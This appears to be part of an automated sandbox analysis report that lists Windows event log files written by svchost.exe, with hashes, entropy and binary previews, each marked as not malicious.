SHA-256:	614320CA05898AED5B72F894AED96F32D44ACCCD2C81F149070F6149EBA1D42A
SHA-512:	B3E0FED2B58DE1F132BB7B70230AAA8904FD0ABE9F829BC1DF787AEC91CFAFE5F34532490FE0E6E6C17EEA077D56D599719FFE340E532437BDB45203F5A60D35
Malicious:	false
Preview:	ElfChnk.%.......R.......%.......R...........`v...x...Q.W....................................................................^...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	66960
Entropy (8bit):	4.196435818230512
Encrypted:	false
SSDEEP:	384:0VDVVh30VNVeoV4uVJVQVVVFJVWVThcVzVYVxVzEVcoVRHVuGVBNVtVLJRbVKVPm:CUGfquvV6fquZRqnqu6Y
MD5:	93A684B320B4D5A35AE7ACD91FBDE1D7
SHA1:	EDFE57AB2EC7073A083D22A23FA4F7B0EF5BAB81
SHA-256:	354A18487853324539863B84D3646D343A5E74E8F1BB97D03B51B01EE482C22D
SHA-512:	233573F1D25D0763154996F42C51236F26B2E5A8DDDB4483D5A9B10FCBAAB89155F204D78B300B327190DFA4222D4EF058A3DF0A24541696749E511A0C959DF8
Malicious:	false
Preview:	ElfChnk......................................o...q...?.......................................................................w.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F................................................................................>..........................aO..&............................L.....................y3.S.............&...............................................................@.......X...a.!.....E..........@.y3.S......1L.....1L.......t........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....g._................../O5.S...........

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67008
Entropy (8bit):	4.179641737078029
Encrypted:	false
SSDEEP:	384:DWmEmFJhTm5mcqmNQtmQmImeohmEvmEmrmymPmXmEmRTm44mD2oIUgm/T7ljm9y8:D3JmjQUFnltz7RMeVnrnCRMeVNE8iM
MD5:	549A354D369673923C1E313633AA7EE1
SHA1:	95F6B5A4036688EE9AAF4BD345A8162B56ABEF9D
SHA-256:	FF36A76BDA6ECBE4FF8AF8B11D5DBBA2DD30D99EA5772A2B1339B4EC9D245EDE
SHA-512:	15334BBCE676BFDA0E9AF6D09653C61CD83A87F6D70E31C791E9FC397BCD6D2DA930DCC85456B4A3E8BBFFCB70C99C1E44AFCF233488B2C200CDD210F70F1D90
Malicious:	false
Preview:	ElfChnk..!......)!.......!......)!........... ...".....z....................................................................d..u................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&.........................................(!......T<y.S.............&...............................................................N.......d..._.!.....[..........@T<y.S......1L......1L...........(!...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.-.S.e.r.v.e.r.9.G?...J...]..-CM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.S.e.r.v.e.r./.O.p.e.r.a.t.i.o.n.a.l...e$W.........................(.....................s.v.c.h.o.s.t...e.x.e.,.S.t.o.r.S.v.c....................

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.3522549266207472
Encrypted:	false
SSDEEP:	48:MkWNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHyJdHLP7jMickH58ykHc:PNVaO8sMa3Z85ZMLArjj73Z85Zu
MD5:	F68543316EDCF9E1D1199F6E9BF204B5
SHA1:	426CC211F82BDD480454D8252E6C3630B82396DA
SHA-256:	BAD44085429F1E116B549BB953C08F8C021796CECED2EC1E0585F325E662F259
SHA-512:	384FD55015460B58A879A6C3FD7F2EE0F009B89D788C174B451E9AACEFD4B5FC9FE43711509046B317AD7BCD7AC1146EB0AB37D4E416BFC795101152FBF001B0
Malicious:	false
Preview:	ElfChnk.....................................p.........# ....................................................................? (9............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 265, DIRTY
Category:	dropped
Size (bytes):	194808
Entropy (8bit):	4.485825493639411
Encrypted:	false
SSDEEP:	1536:RCSMLUa0eQx5SRw5CSMLUa0eQx5SRwgCSMLUa0eQx5SRw9:RCSMLuDCSMLuiCSMLu7
MD5:	37D8B34BFA000A3219DD6846050A4958
SHA1:	7AC43741E367038030E66ED02FB4ABF872A63078
SHA-256:	20C42C086CA135B1EA8BACB251317F426C64679E7EC0D773871423FD203E585A
SHA-512:	46764FA984E3B93B33488B6C92F74204F29D2AB8219C2A6344E1B3A3DF43C5F3461DE860D139B0B569CE65C7940B9AD8B2A6B08E2F51B2E1D74033453FFCCB40
Malicious:	false
Preview:	ElfFile.....................................................................................................................n.(.ElfChnk......................................... ...............................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...................................5.......................E...E...................u...........................................e...................**..P...........>.................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.7026168607710455
Encrypted:	false
SSDEEP:	768:UfB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3t:0XY5nVYIyyqED5BVZUeouPZwlC
MD5:	C510492B529FC1165E92017D095A59B9
SHA1:	81D2C01FF7B6CD1056E82609749DC4AB51EF50FF
SHA-256:	BFEC826465975890EF5A649CFA72B50AC48E00D489AEC3BA5A6EF9345B7A6AE9
SHA-512:	B5F523B7422B74390F28C87FC6E20CAC7D4EB379B60625D97ED2F5A716297AF5B13D106D9EF7BCB9E7D9F9072AD67F149B3C8DC30E49A819A5C7B24EED900886
Malicious:	false
Preview:	ElfChnk....................................................................................................................Q'd.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...............a.5L.............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	92800
Entropy (8bit):	2.5871940693317557
Encrypted:	false
SSDEEP:	384:2hdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorRor9orwTorYorDor+Y+:2DCY17DCY1Z
MD5:	DC97AC5E14D6B3F1D8569719E119BC50
SHA1:	D6F526A5F2A8F21F81C1339F0966C3496A093031
SHA-256:	68E8069FC03E9C61B41B02A816C06306026FCDC58D68B7A7FB6593564998DFC1
SHA-512:	55C71D5E2D05DBA867D514656A49BE97ADCD9DF10EF17C2B02163283025E949606259C7ACBB38F51E4B4598B0AC66F25C8586C900C6D9642F6504E948912DD68
Malicious:	false
Preview:	ElfChnk.........#...............#...........8P..pR..bd^......................................................................:.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................9..................................=5...........$..U/..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.940782148453977
Encrypted:	false
SSDEEP:	384:lGhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P8PtPZP:lG2Nr
MD5:	2DE423E8526BB1334B8DD7B82373E925
SHA1:	E5E1E5986C779AFC5C552D3438967BC89E44E90E
SHA-256:	50C23D4A07075F27912E928CD13A0527451FCA83F5C931AD3B3881C7059F7214
SHA-512:	8A9692C629384AA6753E008744863E842A527E6E256996004254DB715D5CDA62405611D23A068994ABA9EC9DE8509A6D69A864D263922D6BED377ACE4CEAB88C
Malicious:	false
Preview:	ElfChnk......................................)..(+.....z....................................................................1%.................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9305675907944744
Encrypted:	false
SSDEEP:	384:mhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:mWXSYieD+tvgzmMvRpBWfb3k3
MD5:	6D55D03B1CC547F3984D69B2CC58F017
SHA1:	A94F8663F9721AF5440857B24F6EFA28DA297000
SHA-256:	60CA6575D991B2155AD8FF0F3FC7281793B18B72C673627E6694942AC6BCBCFA
SHA-512:	9C866F783002260F70FEFB88704020B37269DCFF4722114FE4BEAD1868D6AD721340629B530B85020A0D70077C01AB3E8F0C3A9F67D8FCCE9628FFB79F7A4888
Malicious:	false
Preview:	ElfChnk......................................)...............................................................................E.................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................*..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.3309034357998333
Encrypted:	false
SSDEEP:	384:MhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28p:MbCyhLfIXBS5
MD5:	E32DBB2A21BA4E59204991B17F9332BE
SHA1:	C1B6A37094E940E3584F05F58238E1603DD9A5A8
SHA-256:	E57FCF12E8FAFA95DC5F8A8C1C9223C5FB5F6C02DBA8AA385B337B5C62AAB7FE
SHA-512:	2D053F50E48EC509C18F7BBC677DA991486122201EF3CF17E9231F6ACDDDAC7D41C320DCDB73EBEFC759EB7AAFA8ACB0EF9A71886E036ECB43F6B5363ACB3A2C
Malicious:	false
Preview:	ElfChnk.........S...............S...................X..........................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.1086256552224087
Encrypted:	false
SSDEEP:	768:+cMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH1Q:HMhFBuVge
MD5:	D3F2AB60A65C87D02E1FE90953468734
SHA1:	0DA935986A04A82BCA60A8EA0D107D211A652FAC
SHA-256:	8FA6A084AB7BBB70BA281012BB6866BE71D5AC8DDB08714E833A801762F4F789
SHA-512:	DBCEA8584B905304AF3FF04DF4912E73CF00550FE0FA5409BB42F2E060BAF13DE9217B142D954A12A3142DA3B6AD8519DBDF5E6A60F6AA773F5F44CE826F826D
Malicious:	false
Preview:	ElfChnk.........G...............G...............H....T......................................................................?dP................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.3656851645233483
Encrypted:	false
SSDEEP:	48:MdWy0rP+MZQNRBEZWTENO4bpBkoLacnPcoo/cxboBEkcxbo:pKNVaO80oGcnPcPcxbolcxb
MD5:	8EE039866A3936C0273A56DF835D4C05
SHA1:	CF2B22D9D6ECC299F6E3B5E49F14238BDC5F8E25
SHA-256:	4D88C20DE5CC5EF39D1FCC92377655680707D54A9A9262457598419026613CB2
SHA-512:	B2A9856EB98BC66414C057538B077AD454604D73BB5C5D9D1EBA13E024DD6353CC2FB718FE0CB476D9A1E1217BE0F2A0CE294ACFBADBF80C8DFBC58EF3E5613B
Malicious:	false
Preview:	ElfChnk.v.......x.......v.......x...........P...`....rw(....................................................................7.m.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..@...v...........L.............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.421907516710215
Encrypted:	false
SSDEEP:	384:s7hNE3E0mE0EREWEZEAE3OhEmELVFEEE5ejElEreEFEzEAEWERE5ETEmeENDLESL:s7kyeBz7V/vtGjl2KquQuVwEmLkS2
MD5:	87A4763C259B9822763AD68089B168F1
SHA1:	16E4DBBDF0F5543376BE68C3B9516F3C363D73B4
SHA-256:	FF5949B4BDF48AF0BF6B621A5096875CB1D025F8238EDE674E27A3EEE93DFF30
SHA-512:	460A20BDD780FB1D7975C95769C599C2ECD0CD7BF0D509242E1BF4F12B5F9E8D43F51EB27C8B368068872145FD6F2F099A933897D4DA1C8082DBD7C87423FC93
Malicious:	false
Preview:	ElfChnk.........................................p....&A.......................................................................~................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................%.......................&...........5.......................**................5L.............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.614748967875935
Encrypted:	false
SSDEEP:	384:thYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlF:t1T4hGvjx
MD5:	6D84836EE14640908F90C7CA91B34DB3
SHA1:	2905D95F88052C563773F3490703441A7622C6CA
SHA-256:	6DFA7EEAC1EC178959DEB4FC2AC4CD8DFEFFE018BB4F3FBF4068FA38F2590C15
SHA-512:	4A5A8D74E9FB005400468BC3C6ACBF7DDDEEFD793F2B38924E338E9F4FA7CF6ACA91077CA68F0B66653B05727F71CEAFBBA5B58A3C1B7AB1C8DCA7D4CA1BB044
Malicious:	false
Preview:	ElfChnk.........z...............z...........`... ....A.......................................................................$.6................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.824468962209197
Encrypted:	false
SSDEEP:	384:ihFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfK:izSKEqsMuy6TNBb
MD5:	18E94459B1D3B6E6E40055AFAD94C75B
SHA1:	ECF259C40206F8154819316E46D2A6EA02192706
SHA-256:	F9DF5ADD8945864B5E4E21A9E6CBB7F600C684FFF1E934ECB5BD2EA50E12F3E6
SHA-512:	075456006C71746161DF7F9E0E15E096DCE19685117EAF76838FB07F4862E9BDFB673D12EA3A58DDF5B7B8EF28E17C3F3A4DD317CD8D912F4777F0CA4A93A82C
Malicious:	false
Preview:	ElfChnk.........\...............\...................7.J.....................................................................EU..................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.417568465346167
Encrypted:	false
SSDEEP:	384:DhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zs:Dmw9g3LUr
MD5:	BFCEA9440666250C0EBBC88365FB103C
SHA1:	4700241EEB6CD70A3F0B76428123BF9EAEAB5A24
SHA-256:	24F3F37E5270A3F4E057B6206C3D74C4B610296EA784DB82B75B4C40570BD109
SHA-512:	0D6A8E864DDA63F1ED5393373B702B88CB394D3C574FE74510F091E733D35D596D058D2FAEB03CD64841B433724A697DDF28878C65E550E8FA89CA49080B2352
Malicious:	false
Preview:	ElfChnk.........?...............?.....................?.......................................................................6E................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.8756628529883042
Encrypted:	false
SSDEEP:	384:shUIoI5IEICIvI5IqI6IkIRjxIVIOI2hIrJZInIeILI:ssjE0
MD5:	91CC863F4A6C84E93ED5FE2642D6B3B0
SHA1:	5EF200327A6A5D112BFE1BDABAF5BD2601CB50AA
SHA-256:	2BC0B288D217D044057467FA91001E0400E6452084870A506CFA356F65DA581B
SHA-512:	B484373F60D5FBD48BEB1399791210172A7A0B5E32D55720600FDD8E6279EB077AD25FAD67D60A9FD9CA35EAEE638D4985AE029A7E46147F238D6F3AAA123D13
Malicious:	false
Preview:	ElfChnk.\.......\.......\.......\....................-'.........................................................................................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**......\........>\|3L.............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
Category:	dropped
Size (bytes):	76040
Entropy (8bit):	4.552623373265625
Encrypted:	false
SSDEEP:	768:0LjpPv++M48PFVbUa+5xZ/LjpPv++M48PFVbUa+5xZyY20sMY3Dp13/n/ydIxm6c:TU
MD5:	440DA8424EB5EA775EC4A9E853C5D1C0
SHA1:	8A97F65ECD95CFEA56B45AC6D2F69F4C34C60C3F
SHA-256:	F6B6340E4E17DD8786DC98E0C75E0308E57ACEE991DF526C00A2E887A44C6399
SHA-512:	3511A198E7561736BB0E19DBBC40EA0C5CE9DD7BF55F37CD897004DD8112CDB1144ECD411951237AC02C9DC0ECF4886D42D915BC1E2CD706B9A937D27F5F4A5D
Malicious:	false
Preview:	ElfFile.....................................................................................................................I..ElfChnk......................................$...(..Qw.......................................................................<................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.085683761803538
Encrypted:	false
SSDEEP:	384:3h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZ1d:3eJw
MD5:	60CA8551B7D4435BBFADA492178148E0
SHA1:	9C06EEDF69BBDCF61102D36718DD39DBFBEE61E4
SHA-256:	B2151CEACD17C81BDC5A2049D0912CCE3D86215FD45EDABE8633E1E2244F3CCE
SHA-512:	B5CA3AA400D2785CEBC9BB08793929E6C65182A399F9E69DDE7BF79C7E78FAB3D0771BABA86DC6413A3109DCF077D5549D27034188B0D5BDA833D5FDFF498F78
Malicious:	false
Preview:	ElfChnk.....................................P0...1............................................................................@........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.3693271154331255
Encrypted:	false
SSDEEP:	384:zhx1B1w1yc10xP1M1V1s1B1a1S1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tSk:z9FhjdjP0cs6N
MD5:	456FE9F86BD6D4B0B8C79817251EC609
SHA1:	57EFA25414A511C0C16961409E9D6A65ECA6181F
SHA-256:	B6BDC9DB4B2D9A1D5F4F89999855A12FE72369B4C8C752A76E1FDB2F1818FA8E
